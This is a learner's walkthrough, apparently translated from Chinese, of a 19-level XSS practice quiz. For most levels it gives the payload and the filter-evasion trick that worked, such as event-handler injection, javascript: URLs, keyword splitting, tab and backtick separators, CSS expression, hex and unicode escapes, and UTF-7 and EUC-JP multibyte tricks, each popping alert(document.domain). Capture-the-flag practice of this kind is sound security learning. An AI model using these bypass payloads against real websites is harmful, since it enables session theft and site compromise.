The process and sentiment of the problem of XSS quiz exercises

XSS Quiz

I just learned XSS recently. So beginners understand that if there are mistakes, please criticize them.

Question 1th

In the beginning, I used Chrome browser. I can't do the first question. Suddenly think of using IE, open IE11, only succeeded.

<script>alert (document.domain);</script>

Question 2nd

The second question, use this directly not.

View the source code.

Construct a, put the left < input ... Sealed off.

"><script>alert (document.domain);</script><"

Question 3rd

Just a random search.

Structure

"</b></form><script>alert (document.domain);</script><from><b>"

Or not.

Visible he filtered the angle brackets and quotes. <> "became an escape character, respectively &lt;&gt;&quot;

I tried to try Jother. Or not.

Access the information on the Internet and find another way to avoid < > ": Unicode Encoding

< \u003c

> \u003e

"\u0022

Or not.

Try Base64 again.

Data:text/html;base64,ijwvyj48l2zvcm0+phnjcmlwdd5hbgvydchkb2n1bwvudc5kb21haw4pozwvc2nyaxb0pjxmcm9tpjxipii=

data:text/html;base64,pgltzybzcmm9ecbvbmvycm9ypwfszxj0kgrvy3vtzw50lmrvbwfpbik+

Doesn't seem to work either. On my knees

Not really. Hint writes, hint:the input in the text box is properly escaped.

The answer on the internet says: "But the input point is not just this place." ”

Had to write in the F12 console:

Alert (Document.domain)

Pop-up window. I don't know what it means. That's not the point.

What do you mean by input points not only here? Try using the tool WebScarab:

Change the following. After Japan, add

<script>alert (document.domain);</script>

The pop window is successful.

Under the Firebug of Firefox, the direct modification is OK. I don't know what the meaning of the quiz is.

Question 4th

Found this thing: more out of

I changed it to Type=text and entered the following directly:

"><input type=" text "value="

Successful pop-up window.

Question 5th

I didn't notice anything at first. No filtering. Suddenly found to have a length limit of 15 characters.

Change the 15 directly to 999. Then fill out and pop the window successfully.

You can also use WebScarab to intercept the post package and modify it. You can bypass the 15 character limit. Successful pop-up window.

Later read the online answer, seems to also use proxy interception.

Question 6th

Just enter something this time. Found that the <> was escaped to &lt;&gt;

Try to take advantage of the preceding knowledge: Unicode encoding. It doesn't seem to work.

It suddenly occurred to me that with this code, no angle brackets were needed:

"Onmouseover=alert (document.domain) align=" left

The pop window is successful.

See the answer is basically the same.

Question 7th

This time just a look, there is no length limit. There is no filtering. Look carefully to find that the &<> "' These symbols are escaped.

&amp; &lt;&gt; &quot; & #39;

Try the preceding Unicode and base64 first:

Test not?

"><"

See Hint,hint:nearly the same ... but a bit more tricky.

Almost forgot the method of the 6th question. Just the quotation marks are not available.

The value of input is suddenly found to have no quotation marks. What quotation marks are needed!

123 Onmouseover=alert (Document.domain)

Mouse over, pop window success.

It seems that the code should be looked at carefully.

Question 8th

This time, search becomes make a link. Sure enough, enter an address and generate the same link below.

What about the visual reflex type?

But the test found that he filtered the quotes. and angle brackets.

"Onclick=alert (document.domain) align=" left

It's not going to work.

Can not help but look at the answer, instantly understand, directly in the SRC inserted code is not finished.

Javascript:alert (Document.domain)

That's okay.

Question 9th

Look at the code, another hidden input.

Hint:utf-7 XSS

Utf-7:a mail-safe Transformation Format of Unicode (RFC1642). This is an encoding that converts Unicode codes using 7-bit ASCII code. It is still designed to pass information in a mail gateway that can only pass 7 for encoding. UTF-7 Direct display of English letters, numbers and common symbols, while other symbols are encoded with modified Base64. The symbol + and-number controls the start and pause of the encoding process. So garbled if there are English words, and accompanied by a + number and-number, this may be UTF-7 encoding.

Nputn Link.ver=alert (document.domain) No matter, first on the firebug cool:

I see that this hidden input,name= "charset", value= "EUC-JP".

This euc-jp is a way of encoding Japanese.

Research answers:

+aci-onmouseover=+aci-alert (document.domain) +adsaig-x=+aci-

Utf-7

Actual test: + encoded as%2b

P1=1%2baci-onmouseover=%2baci-alert (document.domain)%2BADSAIG-X=%2BACI-&CHARSET=EUC-JP

Suddenly there is a comment on another answer:

Now only IE support utf-7 so ie under

I went and used a half-day of Firefox. Revert to IE

Too bad ie can't? What's the situation?

Question 10th

This <> "is not filtered.

With just one trick:

"Onmouseover=alert (document.domain) align=" left

No pop-up window. Look at the code, and find out that the word domain has filtered me.

I'm afraid I'll use the code.

Yes, there's a hidden input on top:

<input type= "hidden" name= "key" value= "Tubhf22ui/qiq" >

What the hell is this?

After a long day, can not help but look at the answer, it is too ingenious:

"Onmouseover=alert (Document.domdomainain); X= "

Filter out domain, both sides together or domain.

With great respect.

"Ametoxbug

Question 11th

This time nothing is filtered. I don't know what the tricks are.

Directly on the code: "Onmouseover=alert (Document.domdomainain); X= "

I went, my mouseover became XXX. Rather than the direct deletion of the previous inning.

The method of the last inning is not so.

One more trick:

"><"

I go, the word error also filtered.

I guess script will also filter:

Sure enough The <script></script> has been deleted.

This time hint: "S/SCRIPT/XSCRIPT/IG;" and "S/on[a-z]+=/onxxx=/ig;" and "S/style=/stxxx=/ig;"

Src= "JavaScript ....

So it becomes javaxscript.

Look at the answer: Use the & #09 (\ t) to separate the script.

With "><a href=" javascr& #09; Ipt:alert (document.domain); " >12</a>

Click on the link, Firefox will open a new window directly

Use IE, but you can pop windows. I'll take a walk?

Question 12th

This time value has no quotation marks. However, it is found that the spaces are filtered. The angle brackets and quotation marks also disappear directly.

The answer is:

"Onmouseover=alert (Document.domain);

First two single quotes. But it's still not working with Firefox. You can use IE.

No, it's not a single quotation mark, but the key ' below the ESC ', the ASCII code is (0x60). Called anti-single quotes.

Answer write:

This one, right? 00 NULL characters, and 20 spaces, angle brackets, single quotes, double quotes are filtered to empty. You can use the reverse quotation mark (') tab to replace the one above. ie under, ff,chrome not.

It's served.

Question 13th

A background color of the problem, unfortunately will filter my quotation marks.

About STYLE,EXPRESSION,CSS and so on basic do not understand. Look directly at the answer.

Write an answer online

Background-color: #f00; Background:url ("Javascript:alert (Document.domain);");

This is not a successful approach.

Another answer to write:

Using expression in CSS styles to implement Onmouseover/onmouseout events in JavaScript

Aa:expression (Onmouseover=function () {alert (document.domain)})

Doesn't seem to work either.

On my knees

Use Firebug to pop the window first.

Ps:14 when you start using the IE8 kernel browser, look back:

Both of them can play the window.

Question 14th

or a style question. First Look at hint:s/(url|script|eval|expression)/xxx/ig;

Is it an upgrade version? Tried, these four words all became XXX. Then the method of the previous question can not be used.

Look again at the answer,

Cos:expres/**/sion (if (!window.x) {alert (document.domain); window.x=1;})

It appears that a blank comment is inserted inside to avoid censorship.

I can't play windows with IE11 and Firefox. There could be a browser problem (with so many problems), so come up with a classic dim sum browser (not advertising), IE8 the kernel. Always press F12 to switch the kernel too cumbersome. This time the window has been played. Then you decide to use it.

Question 15th

This is a JavaScript, using the document.write.

First on the code:

alert (document.domain); Alert ("

Discover Escape <> "

With an escaped ASCII code:

16 Binary,< 0x3c >0x3e

\x3cscript\x3ealert (document.domain); \x3c/script\x3e

Single \ Unsuccessful discovery. Use this:

\\x3cscript\\x3ealert (document.domain); \\x3c/script\\x3e

Successful pop-up window.

Ps:

Do a little experiment, local HTML,

<script>

document.write ("<script>alert (3) </script>");

</script>

Can't play the window.

<script>

document.write ("\x3cscript\x3ealert (3) \x3c/script\x3e");

</script>

If the above is escaped like this, the window will pop. (Chrome)

Question 16th

Visual inspection is similar to 15 questions. But hint added a sentence.

Hint: "document.write ();" and "S/\\x/\\\\x/ig;"

Again, this is a 16-in-one?

\x will change to X, and \\x or \\x. \\\x becomes \\x.

Try decimal, octal, whatever.

<> 's decimal is 60 and 62.

\60script\62alert (document.domain); \60/script\62

Still filtered \. Change to two again:

\\60script\\62alert (document.domain); \\60/script\\62

Still not. \\6 collective disappearance.

Try Unicode. Refer to the previous,

< \u003c

> \u003e

"\u0022

\\u003cscript\\u003ealert (document.domain); \\u003c/script\\u003e

OK.

Question 17th

This topic has two boxes.

Look at the answer, this problem seems more complex, and the Japanese code, and the new version of IE has been fixed.

Tip: Multi-Byte Character

EUC-JP Coding Range:

Byte 1 is 8E, the 2 byte encoding, byte 2 range for A1-DF

Byte 1 is A1-FE, 2 byte encoded, byte 2 is A1-fe

Byte 1 is 8F for 3 byte encoding, byte 2 and byte 3 range are A1-fe

Two form elements are submitted%a7 closing the last double quotes, viewing the source code is successful, why the UI did not succeed? Helpless directly in the Address bar: Javascript:alert (document.domain);

Now found that the browser version of the problem, do not use IE8 this.

P1=1%a7&p2=+onmouseover%3dalert%28document.domain%29%3b+%a7

Skip it altogether.

Question 18th

The same problem.

Skip over.

Question 19th

This topic has no box for input. There is only one link to yourself.

What to do, the direct console input down. (Enter Javascript:alert (Document.domain) in the Address bar.)

All customs clearance.

The process and sentiment of the problem of XSS quiz exercises